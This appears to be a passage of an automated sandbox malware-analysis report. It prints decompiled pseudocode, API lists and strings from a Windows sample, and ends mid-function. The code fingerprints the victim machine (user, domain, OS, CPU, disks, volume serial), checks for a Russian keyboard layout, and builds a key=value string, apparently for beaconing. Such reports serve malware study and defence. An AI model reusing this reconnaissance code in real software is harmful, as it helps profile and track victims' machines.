0x00d749a5
0x00d74998
0x00d7499d
0x00d7499d
0x00d749ac
0x00d749b1
0x00d749b6
0x00d749bd
0x00d749c4
0x00d749cb
0x00d749d2
0x00d749d6
0x00d749e2
0x00d749f8
0x00d74a0b
0x00d74a0f
0x00d74a15
0x00d74a17
0x00d74a1b
0x00d74a1b
0x00d74a21
0x00d74a21
0x00d74a28
0x00d74a32
0x00d74a38
0x00d74a3c
0x00d74a4e
0x00d74a3e
0x00d74a3e
0x00d74a44
0x00d74a44
0x00d74a58
0x00d74a63
0x00d74a65
0x00d74a67
0x00d74a67
0x00d74a80
0x00d74a83
0x00d74a87
0x00d74a94
0x00d74a9d
0x00d74aad
0x00d74aad
0x00d74ab3
0x00d74aba
0x00d74ac2
0x00d74ad0
0x00d74ad0
0x00d74ae1
0x00000000

APIs

Sleep.KERNELBASE(000003E8), ref: 00D748AB

Part of subcall function 00D74550: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745AC
Part of subcall function 00D74550: lstrcpyW.KERNEL32 ref: 00D745CF
Part of subcall function 00D74550: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745D6
Part of subcall function 00D74550: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745EE
Part of subcall function 00D74550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745FA
Part of subcall function 00D74550: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D74601
Part of subcall function 00D74550: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D7461B

ExitProcess.KERNEL32 ref: 00D748BC
CreateThread.KERNEL32 ref: 00D748D1
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00D748E9
TerminateThread.KERNEL32(00000000,00000000), ref: 00D748FC
CloseHandle.KERNEL32(00000000), ref: 00D74906
ExitProcess.KERNEL32 ref: 00D7496E

Strings

open, xrefs: 00D74AC9

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: CreateErrorExitLastProcessThreadVirtual$AllocCloseFreeHandleMutexObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 3160775492-2758837156
Opcode ID: 6037ea3345ae6f45b07b7789c9d9b1b0ebfe816520fc8ab876a2e30c4b3c36a2
Instruction ID: ee309174d95a96c41c8277fdbfaf11eebbf1ef731503a87572e8bc62ef0b8386
Opcode Fuzzy Hash: 6037ea3345ae6f45b07b7789c9d9b1b0ebfe816520fc8ab876a2e30c4b3c36a2
Instruction Fuzzy Hash: 9B612D71A40309ABEB15EBA0DC5ABEEB774EF44705F508018F609B62D0EBB45A84CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D76D90 Relevance: 156.3, APIs: 62, Strings: 27, Instructions: 551
registrymemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00D76D90(char* __ecx) {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				int _v28;
				int _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t182;
				long _t183;
				short _t186;
				short _t187;
				short _t188;
				signed int _t189;
				signed int _t194;
				void* _t209;
				signed int _t211;
				signed int _t214;
				WCHAR* _t218;
				WCHAR* _t219;
				long _t228;
				_Unknown_base(*)()* _t233;
				long _t242;
				signed int _t245;
				intOrPtr _t250;
				WCHAR* _t252;
				WCHAR* _t254;
				void* _t263;
				WCHAR* _t269;
				void* _t278;
				WCHAR* _t286;
				void* _t287;
				WCHAR* _t289;
				WCHAR* _t290;
				WCHAR* _t292;
				DWORD* _t296;
				char* _t300;
				short* _t301;
				DWORD* _t307;
				signed int _t310;
				void* _t314;
				char* _t316;
				char* _t318;
				void* _t319;
				void* _t320;

				_t300 = __ecx;
				_t318 = __ecx;
				if( *__ecx != 0) {
					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4);
					_t300 =  &_v28;
					 *(_t318 + 8) = _t292;
					_v28 = 0x100;
					GetUserNameW(_t292, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
					_v28 = 0x1e;
					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4);
					_t300 =  &_v28;
					 *(_t318 + 0x14) = _t290;
					GetComputerNameW(_t290, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
					L11:
					if( *(_t318 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
							L35:
							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
								L42:
								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
									L51:
									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
										_v32 = 0;
										_t250 = E00D77520(_t318 + 0x2c,  &_v32);
										if(_t250 == 0) {
											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
										}
									}
									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
										 *(_t318 + 0x68) = _t218;
										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
										_v16 = _t219;
										_t81 =  &(_t219[0x306]); // 0x60c
										_v8 = _t81;
										GetWindowsDirectoryW(_t219, 0x100);
										_t300 = _v16;
										_t300[6] = 0;
										_t85 =  &(_t300[0x600]); // 0x600
										_t307 = _t85;
										_t86 =  &(_t300[0x400]); // 0x400
										_v20 = _t307;
										_t88 =  &(_t300[0x604]); // 0x604
										_t89 =  &(_t300[0x608]); // 0x608
										_t90 =  &(_t300[0x200]); // 0x200
										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
										_v24 = 0;
										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
										if(_t228 == 0) {
											_t300 = _v8;
											_v32 = 0x80;
											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
											if(_t242 != 0) {
												GetLastError();
											} else {
												_v24 = 1;
											}
											RegCloseKey(_v28);
											if(_v24 != 0) {
												_t245 = lstrlenW(_v8);
												_t300 = _v8;
												_push(_t300);
												E00D76D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
											}
										}
										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
										_t320 = _t320 + 0xc;
										lstrcatW( *(_t318 + 0x68), _v8);
										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
										_v32 = _t233;
										if(_t233 == 0) {
											 *(_t318 + 0x6c) = 0;
										} else {
											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
										}
										 *(_t318 + 0x70) =  *_v20;
										VirtualFree(_v16, 0, 0x8000); // executed
									}
									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
										L78:
										if( *(_t318 + 0x80) == 0) {
											L83:
											return 1;
										}
										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4);
										 *(_t318 + 0x84) = _t182;
										if(_t182 == 0) {
											L82:
											 *(_t318 + 0x80) = 0;
											goto L83;
										}
										_push(_t300);
										_t183 = E00D768F0(_t182);
										if(_t183 != 0) {
											goto L83;
										}
										VirtualFree( *(_t318 + 0x84), _t183, 0x8000);
										goto L82;
									} else {
										_v68 = L"UNKNOWN";
										_v64 = L"NO_ROOT_DIR";
										_v60 = L"REMOVABLE";
										_v56 = L"FIXED";
										_v52 = L"REMOTE";
										_v48 = L"CDROM";
										_v44 = L"RAMDISK";
										 *(_t318 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
										_t301 =  &_v132;
										_t186 = 0x41;
										do {
											 *_t301 = _t186;
											_t301 = _t301 + 2;
											_t186 = _t186 + 1;
										} while (_t186 <= 0x5a);
										_t187 =  *L"?:\\"; // 0x3a003f
										_v40 = _t187;
										_t188 =  *0xd7e308; // 0x5c
										_v36 = _t188;
										_t189 = 0;
										_v28 = 0;
										do {
											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
											_t310 = GetDriveTypeW( &_v40);
											if(_t310 > 2 && _t310 != 5) {
												_v36 = 0;
												lstrcatW( *(_t318 + 0x7c),  &_v40);
												_v36 = 0x5c;
												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
												lstrcatW( *(_t318 + 0x7c), "_");
												if(GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20) == 0) {
													lstrcatW( *(_t318 + 0x7c), L"0,");
													goto L75;
												}
												_v12 = E00D78470(_v20, 0, _v32 * _v24, 0);
												_t296 = _t307;
												_t209 = E00D78470(_v16, 0, _v32 * _v24, 0);
												_t314 = _v12;
												_v8 = _t314 - _t209;
												asm("sbb eax, edx");
												_v12 = _t296;
												_t211 = lstrlenW( *(_t318 + 0x7c));
												_push(_t296);
												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
												_t214 = lstrlenW( *(_t318 + 0x7c));
												_push(_v12);
												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
												_t320 = _t320 + 0x20;
												lstrcatW( *(_t318 + 0x7c), ",");
											}
											_t189 =  &(1[_v28]);
											_v28 = _t189;
										} while (_t189 < 0x1b);
										_t194 = lstrlenW( *(_t318 + 0x7c));
										_t300 =  *(_t318 + 0x7c);
										_t300[_t194 * 2 - 2] = 0;
										goto L78;
									}
								}
								__imp__GetNativeSystemInfo( &_v76);
								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4);
								_t300 = _v76 & 0x0000ffff;
								 *(_t318 + 0x5c) = _t252;
								if(_t300 > 9) {
									L49:
									_push(L"Unknown");
									L50:
									wsprintfW(_t252, ??);
									_t320 = _t320 + 8;
									goto L51;
								}
								_t300 = _t300[E00D77510] & 0x000000ff;
								switch( *((intOrPtr*)(_t300 * 4 +  &M00D774FC))) {
									case 0:
										_push(L"x86");
										goto L50;
									case 1:
										_push(L"ARM");
										goto L50;
									case 2:
										_push(L"Itanium");
										goto L50;
									case 3:
										_push(L"x64");
										goto L50;
									case 4:
										goto L49;
								}
							}
							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4);
							_v20 = _t254;
							 *(_t318 + 0x50) = _t254;
							_v24 = 0;
							if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28) != 0) {
								L41:
								_push(_t300);
								E00D76D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
								wsprintfW( *(_t318 + 0x50), L"error");
								_t320 = _t320 + 8;
								goto L42;
							}
							_v32 = 0x80;
							if(RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32) != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v28);
							if(_v24 != 0) {
								goto L42;
							} else {
								goto L41;
							}
						}
						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4);
						_v16 = _t263;
						_v28 = _t263 + 0xe;
						 *(_t318 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
						_t316 = 1;
						_v8 = 1;
						_v12 = 0;
						do {
							wsprintfW(_v16, L"%d", _t316);
							_t320 = _t320 + 0xc;
							_v24 = 0;
							_t316 =  &(_t316[1]);
							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20) != 0) {
								L27:
								_t269 = 0;
								_v8 = 0;
								L29:
								_t300 = _v12;
								goto L30;
							}
							_v32 = 0x80;
							if(RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32) != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v20);
							if(_v24 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v28, L"00000419") != 0) {
									_t269 = _v8;
									goto L29;
								}
								wsprintfW( *(_t318 + 0x44), "1");
								_t320 = _t320 + 8;
								_t300 = 1;
								_t269 = 0;
								_v12 = 1;
								_v8 = 0;
							}
							L30:
						} while (_t316 != 9 && _t269 != 0);
						if(_t300 == 0) {
							wsprintfW( *(_t318 + 0x44), "0");
							_t320 = _t320 + 8;
						}
						VirtualFree(_v16, 0, 0x8000);
						goto L35;
					}
					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4);
					_v24 = _t278;
					 *(_t318 + 0x38) = _t278;
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16) != 0) {
						L17:
						 *(_t318 + 0x30) = 0;
						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v28 = 0x40;
					if(RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28) != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v16);
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t318 + 0x20) = _t286;
					if(_t286 == 0) {
						goto L11;
					}
					_push(_t300);
					_t287 = E00D76D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
					if(_t287 == 0) {
						wsprintfW( *(_t318 + 0x20), L"undefined");
						L10:
						_t320 = _t320 + 8;
						goto L11;
					}
					_t289 =  *(_t318 + 0x20);
					if( *_t289 != 0) {
						goto L11;
					}
					wsprintfW(_t289, L"WORKGROUP");
					goto L10;
				}
			}

0x00d76d90
0x00d76d9b
0x00d76da7
0x00d76db7
0x00d76db9
0x00d76dbc
0x00d76dc1
0x00d76dc8
0x00d76dc8
0x00d76dd2
0x00d76ddf
0x00d76de6
0x00d76de8
0x00d76deb
0x00d76df0
0x00d76df0
0x00d76e00
0x00d76e56
0x00d76e5a
0x00d76ef5
0x00d76ef9
0x00d77024
0x00d77028
0x00d770d6
0x00d770da
0x00d77134
0x00d77138
0x00d7713d
0x00d77149
0x00d77150
0x00d77152
0x00d77152
0x00d77150
0x00d77159
0x00d7716d
0x00d7717d
0x00d77180
0x00d77188
0x00d7718b
0x00d77191
0x00d77194
0x00d7719a
0x00d771a4
0x00d771a8
0x00d771a8
0x00d771ae
0x00d771b4
0x00d771b8
0x00d771bf
0x00d771cc
0x00d771d4
0x00d771dd
0x00d771f6
0x00d771fe
0x00d77200
0x00d77214
0x00d7721b
0x00d77223
0x00d7722e
0x00d77225
0x00d77225
0x00d77225
0x00d77237
0x00d77241
0x00d77246
0x00d7724c
0x00d7724f
0x00d77268
0x00d77268
0x00d77241
0x00d7727a
0x00d77282
0x00d7728b
0x00d7729e
0x00d772a4
0x00d772a9
0x00d772c7
0x00d772ab
0x00d772c2
0x00d772c2
0x00d772da
0x00d772e1
0x00d772e1
0x00d772f3
0x00d774a0
0x00d774a7
0x00d774f0
0x00d774f9
0x00d774f9
0x00d774b7
0x00d774bd
0x00d774c5
0x00d774e4
0x00d774e4
0x00000000
0x00d774e4
0x00d774c7
0x00d774c9
0x00d774d0
0x00000000
0x00000000
0x00d774de
0x00000000
0x00d772f9
0x00d77307
0x00d7730e
0x00d77315
0x00d7731c
0x00d77323
0x00d7732a
0x00d77331
0x00d7733a
0x00d7733d
0x00d77340
0x00d77345
0x00d77345
0x00d77348
0x00d7734b
0x00d7734c
0x00d77352
0x00d77357
0x00d7735a
0x00d7735f
0x00d77362
0x00d77364
0x00d77370
0x00d77375
0x00d77383
0x00d77388
0x00d77399
0x00d773a4
0x00d773b2
0x00d773b6
0x00d773c0
0x00d773de
0x00d77479
0x00000000
0x00d77479
0x00d77400
0x00d77403
0x00d77405
0x00d7740a
0x00d77416
0x00d77419
0x00d7741b
0x00d7741e
0x00d77427
0x00d77438
0x00d77446
0x00d77448
0x00d7745a
0x00d77462
0x00d7746d
0x00d7746d
0x00d77484
0x00d77485
0x00d77488
0x00d77494
0x00d77496
0x00d7749b
0x00000000
0x00d7749b
0x00d772f3
0x00d770e0
0x00d770f1
0x00d770f3
0x00d770f7
0x00d770fd
0x00d77129
0x00d77129
0x00d7712e
0x00d7712f
0x00d77131
0x00000000
0x00d77131
0x00d770ff
0x00d77106
0x00000000
0x00d77122
0x00000000
0x00000000
0x00d77114
0x00000000
0x00000000
0x00d7711b
0x00000000
0x00000000
0x00d7710d
0x00000000
0x00000000
0x00000000
0x00000000
0x00d77106
0x00d7703c
0x00d7703e
0x00d77041
0x00d77059
0x00d77068
0x00d770ac
0x00d770ac
0x00d770c4
0x00d770d1
0x00d770d3
0x00000000
0x00d770d3
0x00d7706d
0x00d7708c
0x00d77097
0x00d7708e
0x00d7708e
0x00d7708e
0x00d770a0
0x00d770aa
0x00000000
0x00000000
0x00000000
0x00000000
0x00d770aa
0x00d76f0d
0x00d76f16
0x00d76f20
0x00d76f25
0x00d76f28
0x00d76f2d
0x00d76f34
0x00d76f40
0x00d76f49
0x00d76f4b
0x00d76f4e
0x00d76f58
0x00d76f73
0x00d76fe3
0x00d76fe3
0x00d76fe5
0x00d76fed
0x00d76fed
0x00000000
0x00d76fed
0x00d76f78
0x00d76f95
0x00d76fa0
0x00d76f97
0x00d76f97
0x00d76f97
0x00d76fa9
0x00d76fb3
0x00000000
0x00d76fb5
0x00d76fc5
0x00d76fea
0x00000000
0x00d76fea
0x00d76fcf
0x00d76fd1
0x00d76fd4
0x00d76fd9
0x00d76fdb
0x00d76fde
0x00d76fde
0x00d76ff0
0x00d76ff0
0x00d76fff
0x00d77009
0x00d7700b
0x00d7700b
0x00d77018
0x00000000
0x00d7701e
0x00d76e6e
0x00d76e70
0x00d76e73
0x00d76e8b
0x00d76e9a
0x00d76ede
0x00d76ee8
0x00d76eef
0x00000000
0x00d76eef
0x00d76e9f
0x00d76ebe
0x00d76ec9
0x00d76ec0
0x00d76ec0
0x00d76ec0
0x00d76ed2
0x00d76edc
0x00000000
0x00000000
0x00000000
0x00000000
0x00d76e02
0x00d76e10
0x00d76e12
0x00d76e17
0x00000000
0x00000000
0x00d76e19
0x00d76e2f
0x00d76e36
0x00d76e51
0x00d76e51
0x00d76e53
0x00000000
0x00d76e53
0x00d76e38
0x00d76e3f
0x00000000
0x00000000
0x00d76e51
0x00000000
0x00d76e51

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00D76DB7
GetUserNameW.ADVAPI32(00000000,?), ref: 00D76DC8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00D76DE6
GetComputerNameW.KERNEL32 ref: 00D76DF0
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00D76E10
wsprintfW.USER32 ref: 00D76E51
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00D76E6E
RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00D76E92
RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00D76EB6
GetLastError.KERNEL32 ref: 00D76EC9
RegCloseKey.ADVAPI32(00000000), ref: 00D76ED2
VirtualFree.KERNEL32(00D748B6,00000000,00008000), ref: 00D76EEF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00D76F0D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00D76F23
wsprintfW.USER32 ref: 00D76F49
RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,00D74590), ref: 00D76F6B
RegQueryValueExW.ADVAPI32(00D74590,00000000,00000000,00000000,?,?), ref: 00D76F8D
GetLastError.KERNEL32 ref: 00D76FA0
RegCloseKey.ADVAPI32(00D74590), ref: 00D76FA9
lstrcmpiW.KERNEL32(?,00000419), ref: 00D76FBD
wsprintfW.USER32 ref: 00D76FCF
wsprintfW.USER32 ref: 00D77009
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D77018
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 00D7703C
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00D77060
RegQueryValueExW.ADVAPI32(?,productName,00000000,00000000,00D74590,?), ref: 00D77084
GetLastError.KERNEL32 ref: 00D77097
RegCloseKey.ADVAPI32(?), ref: 00D770A0
wsprintfW.USER32 ref: 00D770D1
GetNativeSystemInfo.KERNEL32(?), ref: 00D770E0
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 00D770F1
wsprintfW.USER32 ref: 00D7712F
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 00D7716D
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 00D77180
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00D77194
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 00D771D4
RegOpenKeyExW.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 00D771F6
RegQueryValueExW.KERNELBASE(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 00D7721B
GetLastError.KERNEL32 ref: 00D7722E
RegCloseKey.ADVAPI32(?), ref: 00D77237
lstrlenW.KERNEL32(00000000), ref: 00D77246

Part of subcall function 00D76D10: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D26
Part of subcall function 00D76D10: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D47
Part of subcall function 00D76D10: RegCloseKey.KERNELBASE(?,?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D57

wsprintfW.USER32 ref: 00D7727A
lstrcatW.KERNEL32(?,00000000), ref: 00D7728B
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00D77297
GetProcAddress.KERNEL32(00000000), ref: 00D7729E
lstrlenW.KERNEL32(?), ref: 00D772AE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00D772E1
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00D77338
GetDriveTypeW.KERNEL32(?), ref: 00D7737D
lstrcatW.KERNEL32(?,?), ref: 00D773A4
lstrcatW.KERNEL32(?,00D8073C), ref: 00D773B6
lstrcatW.KERNEL32(?,00D807B0), ref: 00D773C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00D74590), ref: 00D773D6

Strings

ntdll.dll, xrefs: 00D77292
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00D7704F
productName, xrefs: 00D7707C, 00D770B5
@, xrefs: 00D76E9F
?:\, xrefs: 00D77352
00000419, xrefs: 00D76FB5
%I64u, xrefs: 00D77451
Identifier, xrefs: 00D77259
Domain, xrefs: 00D76E20
x64, xrefs: 00D7710D
%I64u/, xrefs: 00D77432
RtlComputeCrc32, xrefs: 00D7728D
Itanium, xrefs: 00D7711B
error, xrefs: 00D770C9
x86, xrefs: 00D77122
LocaleName, xrefs: 00D76EAE
iet, xrefs: 00D76FBD
Control Panel\International, xrefs: 00D76E81
undefined, xrefs: 00D76E49
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 00D770BA
Keyboard Layout\Preload, xrefs: 00D76F61
ProcessorNameString, xrefs: 00D7720C
ARM, xrefs: 00D77114
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00D771EC, 00D7725E
WORKGROUP, xrefs: 00D76E41
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 00D76E25
Unknown, xrefs: 00D77129

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
String ID: iet$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 2088797152-3290575438
Opcode ID: e8f4d08dd5277ff05fd9d9614b7bd4933920679be488729438956d8600043a27
Instruction ID: 2eab6fd526555f7a637c0ae81511bc40c16adf8fcca4de754c56c24327315243
Opcode Fuzzy Hash: e8f4d08dd5277ff05fd9d9614b7bd4933920679be488729438956d8600043a27
Instruction Fuzzy Hash: DA225271A40305AFEB219FA4CC49FAEBBB5FF04704F108419F659A6290F7B1A948CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D769A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D769A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
